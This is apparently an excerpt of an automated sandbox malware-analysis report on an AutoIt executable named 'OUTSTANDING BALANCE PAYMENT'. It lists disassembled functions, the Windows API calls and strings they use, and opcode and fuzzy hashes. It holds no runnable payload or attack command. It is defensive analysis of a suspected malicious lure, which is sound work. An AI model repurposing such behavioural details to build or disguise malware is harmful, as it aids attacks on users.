                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: EnumImageLoadNamesResource
                                                                  • String ID: >(
                                                                  • API String ID: 1578290342-2420188955
                                                                  • Opcode ID: 99a588800d06d0e957f0de55dbad317025c8c43a268db7e851c52b649a5c19fc
                                                                  • Instruction ID: 2078d011783272474d4f8ce43aa2bde0628442cbb2723391a2ce125a3e465026
                                                                  • Opcode Fuzzy Hash: 99a588800d06d0e957f0de55dbad317025c8c43a268db7e851c52b649a5c19fc
                                                                  • Instruction Fuzzy Hash: 9FF06D39651715B7E2215B1ABC4AF933FADE706BB9F100506F614AE1D0D6E0A0D08B90
                                                                  Function 002C7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp
                                                                  • String ID: #32770
                                                                  • API String ID: 2292705959-463685578
                                                                  • Opcode ID: fe4e6af14d8af459a134a2fd15cfaaf72ab24c6725aeb405b82901a2a0b60370
                                                                  • Instruction ID: 0d308ba8e5474e67e3aaba0fbce8bbf8f3334c06fac42c7549be952e055c7c53
                                                                  • Opcode Fuzzy Hash: fe4e6af14d8af459a134a2fd15cfaaf72ab24c6725aeb405b82901a2a0b60370
                                                                  • Instruction Fuzzy Hash: 30E09277A042292BD711AAA5DC4AED7FBACEB51764F00011AF905E7081DA60A6158BD4
                                                                  Function 002BA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002BA63F
                                                                    • Part of subcall function 002A13F1: _doexit.LIBCMT ref: 002A13FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Message_doexit
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 1993061046-4017498283
                                                                  • Opcode ID: ccb3dcae1522715af577c2faa3aa03082ec605f28a553a4118f8173811a3dada
                                                                  • Instruction ID: 7a0dc3441d030bd279488d29fec57c177448dfa96c0240c232e434427ed162df
                                                                  • Opcode Fuzzy Hash: ccb3dcae1522715af577c2faa3aa03082ec605f28a553a4118f8173811a3dada
                                                                  • Instruction Fuzzy Hash: ACD05B313D532833D6153ADC7C17FC5764C8B15BA1F044056FB08995C24DD295B046D9
                                                                  Function 002FAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 002FACC0
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 002FAEBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                  • String ID: WIN_XPe
                                                                  • API String ID: 510247158-3257408948
                                                                  • Opcode ID: d0b74646137fd1c7b9910a49938d67b932ee230ad0ebd9d024d29e86031f96bc
                                                                  • Instruction ID: c42fd06deff3c776a2581901107345b6fb4c981ad5053c14811cd2925435ee56
                                                                  • Opcode Fuzzy Hash: d0b74646137fd1c7b9910a49938d67b932ee230ad0ebd9d024d29e86031f96bc
                                                                  • Instruction Fuzzy Hash: BAE039B0C201499FCB12DFA4D944AECF7BCAB48340F108093E256B2260CB705A94DF22
                                                                  Function 002E8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002E86A2
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002E86B5
                                                                    • Part of subcall function 002C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7AD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: a5ad7c52bb0181f972f464960c21ed1f6ce8f27b8c6bb0d18fcef1350730241f
                                                                  • Instruction ID: a4e0149674eaee4264cb8fa740838161ecc207dcff481a2ae02c1864e909d792
                                                                  • Opcode Fuzzy Hash: a5ad7c52bb0181f972f464960c21ed1f6ce8f27b8c6bb0d18fcef1350730241f
                                                                  • Instruction Fuzzy Hash: 74D01231396318BBF36967B09C5FFC77A5C9B05B11F10091AF749AA1D0C9E1E950CB54
                                                                  Function 002E86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002E86E2
                                                                  • PostMessageW.USER32(00000000), ref: 002E86E9
                                                                    • Part of subcall function 002C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002C7AD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: 34ed4c8cd08ffb8b062ead68ce63930d76571efa395a8f4b158a78df0815e0cc
                                                                  • Instruction ID: 0cdf49e20505206e9c3c5f7511f45bcd23efce39e8b1e629fe82f4b6c89c3e85
                                                                  • Opcode Fuzzy Hash: 34ed4c8cd08ffb8b062ead68ce63930d76571efa395a8f4b158a78df0815e0cc
                                                                  • Instruction Fuzzy Hash: 6AD0C9313863186BF26A67B09C5BFC66A589B05B11F50091AB645AA1D0C9A1A9508A58